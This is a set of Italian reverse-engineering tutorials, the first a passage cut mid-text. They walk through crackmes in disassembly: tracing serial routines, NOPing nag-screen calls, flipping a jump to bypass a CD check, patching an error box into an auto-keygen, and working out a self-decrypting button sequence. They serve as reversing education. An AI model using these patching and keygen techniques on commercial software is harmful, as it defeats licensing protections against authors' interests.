entrarci  dentro. La prima parte della call non è molto utile  ai  nostri  scopi
quindi non ve la riporto:

/**** CUTTED CALL ****/

004420A2 lea eax, dword ptr [ebp+FFFFFF00] ; Carica in eax il serial

004420A8  push  eax  ;  Salva il serial nello stack  ,  questo  perchè  sarà  il
parametro della seguente call

004420A9 call 00441F90

004420AE push [ebp+08]

004420B1 call 00441FBC ;Questa call la analizzeremo a parte

Quando ci troveremo su questa call, premiamo nuovamente F8 per entrarci.

00441F90 mov eax, dword ptr [esp+08] ;Mette in eax il serial

00441F94 jmp 00441F97

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00441F96 inc eax

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00441F97 cmp byte ptr [eax], 20 ;Controlla che l' ennesimo char puntato  da  eax
sia 20 (quindi ne un numero ne una lettera)

00441F9A  je  00441F96  ;Se è uguale a 20 salta ed incrementa  il  puntatore  al
serial

00441F9C  push  eax  ;In caso contrario usa il nostro serial come  parametro  di
lstrcpy

00441F9D push [esp+08] ;Questo è l' output buffer di lstrcpy

Reference To: KERNEL32.lstrcpyA,

00441FA1 Call dword ptr [00446260] ; Chiamata a lstrcpy

Chi  conosce un pò di C sicuramente avrà capito cosa fa quest' Api,  in  pratica
copia una stringa (il nostro serial), in un' altra locazione (variabile per  gli
amici :-D).

00441FA7 push [esp+04]

Reference To: USER32.CharUpperA

00441FAB Call dword ptr [004464E4] ;Rende maiuscola una stringa

00441FB1 push [esp+04]

00441FB5 call 00415B9C ; Eccovela spiegata qui di seguito ---->

*****************************************

00415B9C push esi

00415B9D mov esi, dword ptr [esp+08] ;Muove in esi il nome

00415BA1 push esi ;Lo salva nello stack (per poi essere usato come parametro  di
strlen)

Reference To: KERNEL32.lstrlenA

00415BA2 Call dword ptr [0044625C]

00415BA8 jmp 00415BB5

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00415BAA dec eax ;Decrementa di uno la lunghezza

00415BAB  cmp byte ptr [eax+esi], 20 ;Controlla che l' ennesimo char puntato  da
eax sia 20

00415BAF jne 00415BB9 ;Salta se è diverso da 20

00415BB1 and byte ptr [eax+esi], 00

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00415BB5 test eax, eax ;La lunghezza del nome è 0???? (cioè esiste :-D)???

00415BB7 ja 00415BAA ;Se è più grande di zero salta sopra

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00415BB9 pop esi

00415BBA ret

Anche questa call non fa altro che controllare se i caratteri siano uguali a 20.
Adesso  dopo il RET a 00415BBA, entreremo nella call più importante cioè  quella
che calcola il serial (in parte).

00441FDD lea eax, dword ptr [ebp+FFFFFEF8] ;Viene caricato in eax il nome

00441FE3 push eax ;Il nome è passato come parametro

Reference To: KERNEL32.lstrlenA

00441FE4 Call dword ptr [0044625C]

00441FEA xor ecx, ecx ;Azzera ecx che in futuro sarà usato come contatore

00441FEC test eax, eax ;Controlla che il nome quanto meno esista

00441FEE mov dword ptr [ebp-08], eax ;Mette il nome in ebp-08

00441FF1 jle 00442039 ;Salta se il numero di lettere del nome e minore o  uguale
a 0

00441FF3 push ebx

00441FF4 push esi

00441FF5 mov esi, dword ptr [ebp-08] ;Muove in esi il nome

00441FF8 push edi ;Salva edi

00441FF9  lea edi, dword ptr [ebp+FFFFFEF8] ;Carica in edi l' indirizzo relativo
al nome

00441FFF sub edi, 00000003 ;Sottrai 3 alla locazione del nome

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00442002 mov eax, ecx

00442004 push 0000000E ; passa questo numero ad ebx

00442006 cdq ;Azzera edx

00442007 pop ebx ;adesso abbiamo in ebx 0000000Eh

00442008 idiv ebx ;dividi eax per ebx

0044200A test edx, edx ; controlla che il resto della divisione sia 0

0044200C jne 00442011 ;se il resto è diverso da 0 salta

0044200E push 00000027 ; | equivale a mov esi,00000027h

00442010 pop esi ; | vedi sopra

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00442011 lea eax, dword ptr [ecx+03]

00442014 movzx edx, byte ptr [edi+eax]

00442018 imul edx, esi

0044201B  add  dword ptr [ebp-04], edx ; In ebp-04 abbiamo dei  valori  costanti
(almeno la prima volta)

0044201E push 0000000E ;Mette E in ebx con il solito metodo

00442020 cdq ;Azzera edx, e si prepara alla divisione

00442021 pop ebx

00442022 idiv ebx ;Divide eax per ebx

00442024 test edx, edx ;Controlla che il resto sia uguale a 0

00442026 je 0044202D ;Se lo è salta

00442028  lea esi, dword ptr [esi+2*esi] ;Carica in esi l' indirizzo relativo  a
[esi+2*esi]

0044202B jmp 00442030 ;Salta alla prossima semi-routine

Referenced by a (U)nconditional or (C)onditional Jump at Address:

0044202D imul esi, 00000007 ;Moltiplica esi per 7

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00442030 inc ecx ;Incrementa ecx,vi ricordo che funge da contatore

00442031  cmp ecx, dword ptr [ebp-08] ;Controlla che ecx sia uguale  ad  ebp-08,
cioè alla variabile dove è stato salvato il valore di ritorno di strlen

00442034  jl  00442002 ;Se ecx è minore di questo valore, ripeti  nuovamente  il
ciclo

00442036 pop edi

00442037 pop esi

00442038 pop ebx

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00442039  mov  eax,  dword ptr [ebp-04] ;Sposta in eax il  seriale  parzialmente
lavorato

0044203C leave ;Rimette a posto lo stack

0044203D ret ;Esce fuori dalla call

Come  avete  visto, la routine non è un granchè difficile, ma  per  agli  ultra-
newbies  potrebbe  creare un pò di confusione. Dopo una  serie  di  divisioni  e
moltiplicazioni, otteniamo in ebp-04, il seriale parzialmente lavorato ed  anche
in chiaro, infatti se fate d ebp-04, lo vedrete il bella mostra, il mio serial è
007EEA66.  Fermiii! , non ditemi che siate già andati a provarlo  ihihi,  se  lo
avete  messo  cosi  com' è avrete ottenuto un messagio d' errore.  Perchè  mai?,
semplice...  andate  a vedere cosa succede dopo il ret. Inizialmente  al  serial
vengono  tolti i primi 2 caratteri, di conseguenza il serial corretto è  7EEA66,
poi  avremo  il  canonico repz e cmpsb tra serial correto e quello  che  abbiamo
messo noi, ed un salto condizionato ;-P.

Note per chi vuole fare un keygen.

Per  ragioni  di  spazio non ho messo il keygen che avevo fatto  (in  masm).  Se
qualcuno  di  voi  volesse fare un keygen, ricordi che: c'è un  valore  costante
precisamente quello in ebp-04 che è 4c694700 (se non ricordo male) quindi  state
attenti :)), inoltre come avete potuto vedere, almeno nella prima parte EAX  non
viene  usato quindi se usate qualche API abbiate l' accortezza di fare  uno  xor
eax,eax  (ovviamente dopo che vi siete salvati il suo contenuto :-P).  Ricordate
in  oltre  la  routine che toglie i primi 2 char. Creare un  keygen  per  questo
programma  è  abbastanza semplice (soprattutto se usate Masm/Tasm :-D).Spero  di
essere  stato  sufficentemente chiaro ed esauriente, se così non è stato,  siete
liberi di maillarmi :)).

Note finali

In  fine  colgo  l' occasione per salutare:Quequero, AndreaGeddon,  e4m,  Slash,
Vinci,Quake2^AM, albe, Ntoskrnl, BIGAlex, Littleluk, Speed Strid. I chan #crack-
it #asm #pmode e #twotux.La marshall per i suoi grandiosi ampli :)).

evilcry
Home page: www.evilcry.cjb.net
E-mail: evilcry@virgilio.it


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          | 
|-- Fant0m Crackmes Reversiamoli tutti e cinque + Autokeygen                   | 
|-- Evilcry <evilcry@virgilio.it>                                              |
|                     _________________________________________________________| 
|____________________/ 
Fant0m Crackmes Reversiamoli tutti e cinque + Autokeygen

DISCLAIMER
Le  informazioni contenute in questo tutorial sono solo a scopo informativo. Non
incoraggiamo nessuno a non registrare e/o pagare i programmi che usa.


Non  avendo niente da fare, ho iniziato a reversare questi cinque crackmes,  che
potrebbero  essere  interessanti per i Newbies che si avvicinano  al  mondo  del
reversing

Tools usati

-SoftIce
-Win32dsasm
-Un HexEditor

URL o FTP del programma

www.evilcry.da.ru
www.fant0m.cjb.net

Si tratta di cinque semplici crackmes più uno riassuntivo.

Crackme1 (trovare il serial)

Bene!,  partiamo con il primo (ihih e da che sennò:P). Per risolverlo ci  serivà
soltanto  il Win32Dasm. Adesso andate a vedere le "String References" e guardate
un  pò....Non  notate  anche voi quella stringa particolare??,  mi  riferisco  a
m0tNaF-EmKCARc  mmh a me puzza. Proviamo a metterla nell' edit  box  del  nostro
crackme  (Rispettate le maiuscole e le minuscole!), e come per magia ci apparirà
la "congratulation box". Che lamerata non trovate??? :-)

Crackme2 (rimozione di 2 nag-screen)

Dopo  aver  avviato  il  secondo  crackme si presentano  2  noiose  nag  screen,
eliminiamole!. Per cosa prima disassembliamo il programma ed andiamo a vedere le
string   references,  nelle  quali  troveremo  la  stringa  NAG  NAG   NAG   mmh
interessante, andiamo a vedere la parte di codice relativa a questa reference:

004010D0 push 00000030 ; Primo parametro per la MessageBox

*Possible StringData Ref from Data Obj ->"Remove me!"

004010D2 push 00403033 ; Altro parametro relativo a MessageBox

*Possible StringData Ref from Data Obj ->"Nag Nag Nag..."

004010D7 push 0040303E ; Ultimo argomento passato alla nostra call

004010DC push 00000000 * Reference To: USER32.MessageBoxA

004010DE E8C5010000 Call 004012A8 ; Questa è la call da noppare

Tutto  quello  che  dobbiamo fare è noppare i bytes relativi alla  Call  che  ci
interressa, cioè E8C501000. Segnamoci l' OFFSET (4DEh) ed aprimamo l' exe con un
hex editor . Sovrascrivete i bytes relativi alla call (solo quelli relativi alla
Call!!)  con  dei nop (OPCODE 90). Faccte ripartire il programma  e.....  Niente
Nag!.  Ci sarebbe un altra nag da eliminare ma questa volta non vi dirò  niente,
il procedimento lo sapete già :-).


Crackme3 (Cd-Check)

Eccoci arrivati al terzo crackme, questa volta dovremo fargli credere che ci sia
il  Cd  originale.  Ah  dimenticavo, questo tipo di protezione  è  rarissima  da
trovare  in un programma commerciale data la sua semplicità :-(. Per prima  cosa
disassembliamolo  ed andiamo a vedere cosa troviamo nella IT (Import  Table)  in
pratica  qui vediamo tutte le API che importa il programma.Tra le quali  c'è  ne
una interessante GetDriveType, di seguito vi riporto le sue references.

GetDriveType(lpRootPathName );

Parametro: lpRootPathName

punta  ad una stringa NULL terminated che specifica la root directory del disco,
per  poi  ritornare delle informazioni su di esso.Se lpRootPathName  è  NULL  la
funzione ci torna delle informazioni riguardanti la directory corrente.

Valori di ritorno:

0 ---->Non può essere determinato il tipo di drive.

1 ---->La root directory non esiste.

2 ---->Il disco può essere rimosso dal drive.

3 ---->Il disco non può essere rimosso dal drive.

4 ---->Il drive si trova su una macchina remota.

5  ---->Il  tipo  di  drive è un Cd-Rom drive. (Quello che ci  interessa  a  noi
ihihih)

6 ----->Il tipo di drive è una RAM.


Adesso analizziamo il codice relativo a quasta API:

* Referenced by a CALL at Address:

0040115E

004011F7 push ebp

004011F8 mov ebp, esp

004011FA push 00000000 ; Qui viene passato il parametro relativo alla nostra API

* Reference To: KERNEL32.GetDriveTypeA, Ord:00F0h

004011FC Call 0040129A ; Chiamata a GetDriveType

00401201 cmp eax, 00000005 ; Quello rilevato è un CD???

00401204 je 0040121D ; Se sono uguali salta alla Congratulation Box

00401206 6A30 push 00000030

Avete  capito tutto? ora ci resta che trasformare quel JE (OFFSET 0604h) in  JNE
(OPCODE 75). Che dirvi! più semplice di cosi :-)))).


Crackme4 (Name + Serial)

Personalmente  rintengo che questo crackme sia un utilissimo  esercizio  per  l'
aspirante  cracker/reverser,  quindi attenzione!.  Apriamo  il  programmillo  ed
inseriamo   un   nome  ed  un  serial  a  caso,  io  ho  inserito:  Nome:evilcry
Serial:123456. Bien! ora settiamo i canonici BPX GetDlgItemTextA e BPX

GetWindowTextA, quindi F5 e clicchiamo su Check .......come per magia  :P  siamo
dentro  Sice,  scorriamo  di processo con F12 fino  ad  arrivare  a  quello  del
crackme.  Vi  assicuro che la routine è semplicissima NON NE TROVERETE  DI  PIU'
Facili :-). Analizziamo il codice insieme:


00401205 push 00000100

0040120A push 00403084 ; Buffer che punta alla edit box del Name

Possible Reference to Dialog: MAINDIALOG

0040120F push 000003E8

00401214 push [ebp+08]

Reference To: USER32.GetDlgItemTextA

00401217 Call 0040137E ; Qui viene preso il nome

0040121C push 00000100

00401221 push 00403184 ; Buffer che punta alla edit box del Serial

Possible Reference to Dialog: MAINDIALOG

00401226 push 000003E9

0040122B push [ebp+08]

Reference To: USER32.GetDlgItemTextA,

0040122E Call 0040137E ; Qui viene preso il serial

00401233 push [ebp+08]


Questo  pezzo  di  codice non fa altro che prendere il Name  ed  il  Serial  che
abbiamo  inserito.Se  fate d 00403084 vedrete il nome che  avete  inserito  e  d
00403184  il  vostro  serial. Andiamo adesso a vedere  la  call  (00401236)  che
calcola  il serial in base al nome inserito, quando ci arrivate di sopra premete
F8, cosi entrerete nella routine vera e propria.


00401236 call 004012F9 ; Routine per il calcolo del serial

0040123B cmp eax, 00000000

0040123E je 00401255 ; Sono uguali? se NO salta al messagio di errore

Il codice che segue è quello relativo alla Call che calcola il serial:

Referenced by a CALL at Address:

004012F9 push ebp ; Creazione di nuovo stack per questa Call

004012FA mov ebp, esp ; Nuovo stack

004012FC push esi

004012FD push edi

004012FE  lea  esi, dword ptr [00403084] ; Viene caricato in  ESI  l'  indirizzo
relativo al Name

00401304  lea  edi, dword ptr [00403284] ; Viene messo in EDI l'  indirizzo  del
Serial messo da noi

0040130A  xor eax, eax ; Si prepara alla routine :-)) in pratica viene  azzerato
EAX

0040130C xor ecx, ecx ; Idem!, azzeramento di ECX

0040130E mov bl, 1A ; Viene messo in bl il numero 1A

00401310 cmp byte ptr [esi], 00 ; Verifica se il Name è finito

00401313  je  0040132A  ;  Se  è  finito salta ,  altrimenti  va  alla  prossima
istruzione

00401315 mov al, byte ptr [esi] ; Sposta in al un char del Name

00401317 add al, cl ; Somma il char a cl

00401319 xor al, cl ; Adesso lo xora per cl

0040131B div bl ; Ora lo divide per bl cioè 1A, Ricordate??

0040131D shr ax, 08 ; Shift a destra di 8

00401321 add al, 41 ; Somma al nostro char la cifra 41

00401323 mov byte ptr [edi], al ; Sposta il char manipolato in EDI, tenetelo  d'
occhio dato che qui si verrà a
formare il serial ---> sarebbe meglio dire la locazione puntata da EDI :)

00401325 inc edi ; Incrementa EDI (il registro dove avremo il serial)

00401326 inc esi ; Incrementa ESI, cioè passa al prossimo char da manipolare

00401327 inc ecx ; Incrementa ECX che funge da contatore

00401328 jmp 00401310 ; Salta a 00401310 per poter manipolare il prossimo char

Bene! questa è la routine che calcola il seriale, avete visto che era semplice!,
basta  tenere  d' occhio il registro EDI e vedrete formarsi il serial  carattere
dopo  carattere  :-))).  Il  serial che ho ricavato dal  mio  nick  (evilcry)  è
XOBEVKR. Provate a fare anche un keygen.

Autokeygenerator

Qualcuno  disse "Che il fa reverser/cracker se non si complica la vita??:P",  io
fedelmente seguirò questo postulato ihihi. Dato che il Crackme4 è tanto scemo :-
),  perchè  non dargli un tocco di originalità(si fa per dire :P)???. Cercheremo
di  trasformarlo in un Autokeygenerator, cioè faremo comparire nella message box
d'errore il serial esatto hihih. Innanzitutto dobbiamo cercare il registro o  la
locazione di memoria dove abbiamo il serial corretto, e noi già lo sappiamo  :-)
se  vi  ricordate  la routine che abbiamo visto poch' anzi, EDI  alla  locazione
00403284 in cui si trova il nostro bel seriale. Ora mettermo questa locazione in
un  punto  preciso della msgbox d' errore.Per comodità vi riporto  le  referenze
dell' API MessageBoxA:


int MessageBox {

HWND hWnd, // handle della owner window

LPCTSTR lpText, // indirizzo del testo della messagebox. Questa ci interessa!!!

LPCTSTR lpCaption, // indirizzo del titolo della messagebox

UINT uType // stile della messagebox

}

Disassembliamo  nuovamente  il programma, ed andiamo  a  cercare  la  msgbox  d'
errore:

:00401255 push 00000030

* Possible StringData Ref from Data Obj ->"Check Serial"

:00401257 push 00403029

* Possible StringData Ref from Data Obj ->"Wrong Serial! Keep trying, you'll " -
>"get it!"

:0040125C 6836304000 push 00403036 Eccolo!!! Questo è il parametro che passa  il
testo

:00401261 push 00000000

* Reference To: USER32.MessageBoxA

:00401263 Call 0040139C

Bene!  segnatevi  l'offset  del  penultimo  Push,  ed  apritelo  con  un  Editor
esadecimale. Adesso andate all' offset che vi eravate segnati, come  non  ve  lo
ricordate???  mah... ve lo dico io 65Ch :-), e sostituite i  bytes  relativi  al
push con questi bytes: 6884324000. Fate ripartire.... mettete un Name/Serial  ad
muzzum.....tadàà! il vs serial il bella vista:-).
Qualcuno adesso si potrebbe chiedere, come ha fatto a trovarsi quei bytes???  la
risposta  è  semplice  sono andato in cerca di un push 00403284  e  me  li  sono
segnati :-). Siamo stati abbastanza fortunati, ma non pensate che sia tutto cosi
semplice, spesso dovrete "dirottare" dei Jump in locazioni vuote (grazie  valori
di  allineamento! hihihihihi) dove è possibile inserire del codice, e li  dentro
dovrete mettere il codice fatto da voi.

Spero  di essere stato d' aiuto ai newbies, se avete qualche dubbio o non  avete
capito qualche cosa, non esitate a scrivermi. Il quinto crackme non è altro  che
un  programma riassuntivo. Se non avete avuto problemi con i precedenti  non  ci
saranno problemi neanche con questo :-))).

Note finali

In  fine  colgo l' occasione per salutare: Quequero, AndreaGeddon, [Evil],  e4m,
Slash, Quake2^AM, Albe, BIGAlex, Ntoskrnl, CityHunter, CyberPK.

evilcry

Home page se presente: www.evilcry.cjb.net
E-mail: evilcry@virgilio.it


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          | 
|-- Detten12 reversing                                                         |
|-- Evilcry <evilcry@virgilio.it>                                              |
|                     _________________________________________________________| 
|____________________/ 
Detten 12 reversing

Questo  crackme non ha la solita combinazione name/serial. Infatti ci  sono  una
serie  di  bottoni,  e  clickando questi bottoni si deve  indovinare  la  giusta
sequenza del serial. Il serial è di 10 cifre.
Per  capire  come  vengono prese le cifre del serial dobbiamo  disassemblare  il
programma.
0040102E cmp [ebp+arg_4], 110h ;WM_INITDIALOG
00401035 jnz short loc_40106E 00401037 mov dword_403048, 0
00401041 mov dword_403038, 0DEADh ;X=DEADh
0040104B mov dword_40303C, 0DEADh ;Y=DEADh
00401055 mov dword_403040, 42424242h ;K=42424242h
0040105F mov dword_40304C, offset aAnErrorOccured ; "An error occured"
00401069 jmp loc_40124C
Niente  di  difficile,  ci  sono 3 variabili a cui sono  assegnati  dei  valori.
Andiamo avanti e vediamo come viene gestito l' evento "click sul bottone".
00401081 cmp [ebp+arg_4], 111h ;WM_COMMAND ??
00401088 jnz loc_401243
0040108E mov eax, [ebp+arg_8]
.......................
004010A0 cmp ax, 65h ; 65 è l' ID del bottone "1)
004010A4 jnz short loc_4010B2 ; Se non è il tasto uno vai la prossimo caso
004010A6 push 1 ;Passa come argomento la cifra "1"
004010A8 call sub_4012A5 ;Questa call la analizzeremo in seguito
004010AD jmp loc_4011F2
....
004010B2 cmp ax, 66h ;Button "2"
004010B6 jnz short loc_4010C4 ;Salta al prossimo caso, se l' ID del button "2"
004010B8 push 2 ;Passa "2" come argomento della call
004010BA call sub_4012A5 ;Solita call
004010BF jmp loc_4011F2
...
Chiunque abbia un pò di dimenstichezza con qualche linguaggio di programmazione,
avrà  certamente capito che si tratta di un costrutto "switch".  Penso  che  sia
inutile riportarvi l' intero codice, tanto questa "routine" si ripete per  tutti
i bottoni. Adesso andiamo a vedere cosa succede nella call 004012A5
004012A5 push ebp
......
004012A9 mov ecx, dword_403040 ;K in ecx
004012AF mov ebx, dword_40303C ;Y in ebx
004012B5 mov eax, dword_403038 ;X in eax
004012BA cmp [ebp+arg_0], 1 ;è il bottone "1"
004012BE jnz short loc_4012D0 ;se non lo è allora
004012C0 add ecx, 54Bh ; K + 54Bh
004012C6 imul ebx, eax ; Y * X
004012C9 xor eax, ecx ; xor X con K
004012CB jmp loc_4013E7
--------------------------------------------------------------------
004012D0 cmp [ebp+arg_0], 2 ;Button 2
004012D4 jnz short loc_4012E8
004012D6 sub ecx, 233h ; K-233h
004012DC imul ebx, 14h ; Y* 14h
004012DF add ecx, eax ;K+X
004012E1 and ebx, eax ;And Y,X
004012E3 jmp loc_4013E7
-------------------------------------------------
004012E8 cmp [ebp+arg_0], 3 ;Button 3
004012EC jnz short loc_4012FD
004012EE add eax, 582h ;X+582h
004012F3 imul ecx, 16h ;K * 16h
004012F6 xor ebx, eax ; xor Y,X
004012F8 jmp loc_4013E7
----------------------------------------------
004012FD cmp [ebp+arg_0], 4 ; Button 4
00401301 jnz short loc_401312
00401303 and eax, ebx ;and X,Y
00401305 sub ebx, 111222h ;Y-111222h
0040130B xor ecx, eax ;xor K,X
0040130D jmp loc_4013E7
---------------------------------------------
00401312 cmp [ebp+arg_0], 5 ;Button 5
00401316 jnz short loc_401324
00401318 cdq
00401319 idiv ecx ; X/K
0040131B sub ebx, edx ; Y - resto della div
0040131D add eax, ecx ;X+K
0040131F jmp loc_4013E7
--------------------------------------------
00401324 cmp [ebp+arg_0], 6 ; Button 6
00401328 jnz short loc_401339
0040132A xor eax, ecx ;xor X,K
0040132C and ebx, eax ;and Y,X
0040132E add ecx, 546879h ; K+546879h
00401334 jmp loc_4013E7
-----------------------------------------
00401339 cmp [ebp+arg_0], 7 ;Button 7
0040133D jnz short loc_401351
0040133F sub ecx, 25FF5h ;K-25ff5h
00401345 xor ebx, ecx ;xor Y,K
00401347 add eax, offset start ;X + Address del Entry Point
0040134C jmp loc_4013E7
----------------------------------------
00401351 cmp [ebp+arg_0], 8 ;Button 8
00401355 jnz short loc_401367
00401357 xor eax, ecx ;xor X,K
00401359 imul ebx, 14h ;Y * 14h
0040135C add ecx, 12589h ;K+ 12589h
00401362 jmp loc_4013E7
-----------------------------------------------
00401367 cmp [ebp+arg_0], 9 ;Button 9
0040136B jnz short loc_401378
0040136D sub eax, 542187h ;X - 542187
00401372 sub ebx, eax ;Y-X
00401374 xor ecx, eax ;xor K,X
00401376 jmp short loc_4013E7
-----------------------------------------------
00401378 cmp [ebp+arg_0], 0Ah ; Button A
0040137C jnz short loc_40138A
0040137E cdq
0040137F idiv ebx ; X/Y
00401381 add ebx, edx ;Y+ Resto della divisione
00401383 imul eax, edx ; X * il resto div
00401386 xor ecx, edx ;xor K, resto
00401388 jmp short loc_4013E7
-----------------------------------------------
0040138A cmp [ebp+arg_0], 0Bh
0040138E jnz short loc_4013A3
00401390 add ebx, 1234FEh ;Y+1234feh
00401396 add ecx, 2345DEh ;K+2345deh
0040139C add eax, 9CA4439Bh ;X+9ca4439bh
004013A1 jmp short loc_4013E7
-------------------------------------------------
004013A3 cmp [ebp+arg_0], 0Ch ;Button c
004013A7 jnz short loc_4013B2
004013A9 xor eax, ebx ;xor X,Y
004013AB sub ebx, ecx ;Y-X
004013AD imul ecx, 12h ; K * 12
004013B0 jmp short loc_4013E7
------------------------------------------------------
004013B2 cmp [ebp+arg_0], 0Dh ;Button D
004013B6 jnz short loc_4013C8
004013B8 and eax, 12345678h ;and X,12345678h
004013BD sub ecx, 65875h ;K-65875
004013C3 imul ebx, ecx ;Y*K
004013C6 jmp short loc_4013E7
---------------------------------------------------------
004013C8 cmp [ebp+arg_0], 0Eh ;Button E
004013CC jnz short loc_4013DB
004013CE xor eax, 55555h ;xor X,55555h
004013D3 sub ebx, 587351h ;Y-587351h
004013D9 jmp short loc_4013E7
--------------------------------------------
004013DB loc_4013DB:
004013DB cmp [ebp+arg_0], 0Fh ;Button F
004013DF jnz short loc_4013E7
004013E1 add eax, ebx ;X+Y
004013E3 add ebx, ecx ;Y+K
004013E5 add ecx, eax ;K+X
004013E7 inc dword_403044 ;incrementa questo contatore
004013ED mov dword_403038, eax ;Valore di eax (X) nella var X
004013F2 mov dword_40303C, ebx ;Valore di ebx (Y) nella var Y
004013F8 mov dword_403040, ecx ;Valore di ecx (K) nella var K
004013FF leave
00401400 retn 4
Bene!,  dopo  questa lunga ma necessaria routine possimo andare  avanti,  avrete
certamente  notato come tutto questo codice si basa sulle tre variabili  (K,Y,X)
che  abbiamo  visto all' inizio, inoltre c' è da osservare che ad  ogni  bottone
corrismponde una diversa routine. Mentre quando viene premuto il bottone "Clear"
le tre variabili vengono resettate cioè riportare ai loro valori originali. All'
uscita della call c' era un jump, il quale ci porta a questa porzione di codice.
004011F2 cmp dword_403048, 3 ; viene confrontato il counter con 3
004011F9 jnb short loc_401228 ; Se è maggiore o uguale a 3, salta
004011FB cmp dword_403044, 0Ah ; confronta il counter con 10
00401202 jnz short loc_401241 ; Salta se è diverso da 10
00401204 call sub_40144C ; la analizzeremo in seguito
00401209 push offset aAnErrorOccured ; "An error occured"
0040120E push [ebp+arg_0]
00401211 call sub_401403 ; altra call che analizzeremo dopo
00401216 mov dword_403044, 0 ; mette il counter a 0
00401220 inc dword_403048 ; incrementa il counter
00401226 jmp short loc_401241
Anche questa parte di codice è abbastanza semplice, l' unica cosa da osservare è
che  la  lunghezza del serial dev' essere compresa tra 3 e 10. Adesso  prima  di
passare  alla  call  0040144C  è  meglio che vi  spieghi  cosa  fa  la  funzione
VirtualProtect:
"  La funzione VirtualProtect cambia la protezione di accesso ad una regione  di
pagine nello spazio di indirizzamento virtuale dei processi chiamanti"
Ora andiamo a vedere cosa c' è in questa call:
0040144C push eax
0040144D push offset unk_403050
00401452 push 4 ;PAGE_READ_WRITE
00401454 push 1F4h ;grandezza 1f4h, cioè 500d
00401459 push offset loc_401407 ;indirizzo che chiameremo Z
0040145E call j_VirtualProtect
00401463 mov eax, dword_403038 ;Variabile X in eax
00401468 xor dword ptr ds:loc_401407, eax ;xor Z con X
0040146E cmp byte ptr ds:loc_401407, 52h ;confronta Z con 52h
00401475  jnz  short loc_40148F ; se non è uguale, salta, di conseguenza  niente
decrypt
00401477 mov eax, dword_40303C ;Variabile Y in eax
0040147C  xor  ds:dword_40143B, eax ;xora Y con quest'indirizzo (che  chiameremo
J), in cui ci sono dei bytes
00401482 mov eax, dword_403040 ;variabile K in eax
00401487  xor  ds:dword_40143F, eax ;xora K con quest' indirizzo(che  chiameremo
W), in cui ci sono una serie di bytes
0040148D jmp short loc_401495
In fine viene richiamata la VirtualProtect per ripristinare i settaggi iniziali,
cioè  dare  alle  pagine l' attributo PAGE_EXECUTE. Credo che  questa  parte  di
codice  meriti  una piccola spiegazione. Per prima cosa viengono modificati  gli
attributi  di  una  regione di memoria con VirtualProtect,  e  più  precisamente
questa parte di memoria è settata a Read e Write in modo da poter essere letta e
scritta.  Questo  ci fa pensare automaticamente a qualche routine  di  scrittura
(come  un  decrypting), che altrimenti non sarebbe possibile. Le  tre  variabili
(K,Y,Z)  vengono xorate con delle dwords che si trovano a 00401407,  0040143b  e
0040143f,  e  a  cui  abbiamo  assegnato  rispettivamente  la  variabili  Z,J,W.
Osservando  più attentamente notiamo che questi indirizzi si trovano nella  call
successiva,  cioè call 401403. Inoltre il confronto che troviamo all'  indirizzo
0040146E serve semplicemente a controllare che ci sia il byte 52h, se non  fosse
52h avremmo un decrypting sbagliato, e di conseguenza non ci sarebbero le giuste
istruzioni  nella call. Facendo un pò di attenzione possiamo vedere che  non  ci
sono  messagi  di congratulazioni, e alla call da decryttare viene passato  come
argomento  la  stringa "An error occured". Secondo il mio punto di vista  questa
stringa  potrebbe  essere "modificata" in maniera da ottenere  il  messaggio  di
congratulazioni.  Adesso  quello che dobbiamo fare  è  cercare  di  capire  come
possiamo  ottenere  un  giusto  decrypting di questa  stringa.  Per  prima  cosa
consideriamo che noi dovremmo trovare nell' indirizzo 00401407 il byte  52h,  il
quale  corrisponde all' istruzione "push edx". Inoltre prima ci sono  tre  bytes
liberi  (cioè  che possiamo cambiare a nostro piacimento) prima  del  decrypting
della  stringa. Il decrypting avviene solamente quando nel registro edx  c'è  l'
indirizzo  di  questa  stringa. La cosa che dobbiamo fare quindi  è  riuscire  a
mettere in edx l' indirizzo della stringa, che si trova a 00403000. Ma ora sorge
un  problema, l' opcode per l' istruzione "mov edx, 00403000" è più lungo di tre
bytes. La soluzione a questo problema è semplice ma non molto intuitiva, infatti
se  facciamo  un pò di stacktrace, scopriamo che l' indirizzo che  cerchiamo  si
trova  in ebp+0Ch!. Abbiamo scelto di usare [ebp+C] perchè l' opcode per  quest'
istruzione occupa esattamente tre bytes.
00401407 52 push edx
00401408 8B 55 0C mov edx, [ebp+C] ;Occupa esattamente tre bytes
Supponendo che la stringa sia stata "decryptata" correttamente, adesso  per  far
comparire  il  messagio di congratulazioni dovremmo passare tre  argomenti  alla
SendDlgItemTexta:
0040143B FF 75 0C push dword ptr [ebp+c]
0040143E 6A 03 push 3
00401440 FF 75 08 push dword ptr [ebp+8]
Oltre  alla  stringa dobbiamo passare l' ID del controllo e l'  handle  (che  si
trova  ad  ebp+8). Con un rapido calcolo vediamo che per fare ciò ci  servono  8
bytes,  cioè 2 Dwords. Adesso penso che sia tutto più chiaro, e quindi  possiamo
procedere a cercare i giusti valori per un decrypting corretto. L' operazione  è
abbastanza  semplice  perchè noi sappiamo esattamente i  valore  dei  bytes  che
dobbiamo ottenere:
Indirizzo
Bytes iniziali
Bytes da ottenere
Result
00401407 (Z)
EB 3F 90 90
52 8B 55 0C
B9 B4 C5 9C
0040143B (J)
04 66 E7 BB
FF 75 0C 6A
FB 13 EB D1
0040143F (W)
4D BD 08 8B
03 FF 75 08
4E 42 7D 83
I  valori che ci sono in Result, sono stati ottenuti con uno XOR (se non  capite
il  perchè  riguardatevi la call a 0040144c) tra i bytes  iniziali  di  ciascuna
delle  locazioni (Z,J,W) ed i bytes relativi agli opcodes delle  istruzioni  che
dobbiamo  ottenere. Come avrete certamente capito in Result vanno i  valori  che
devono assumere rispettivamente le variabili K, Y, X. L' ultima fase è quella di
scrivere un bruteforcer, che simuli la pressione di 10 tasti scegliendo tra i 15
valori  possibili, in modo tale da trovare la giusta combinazione dei tasti  che
facciano assumere a K,Y,X i suddetti valori.
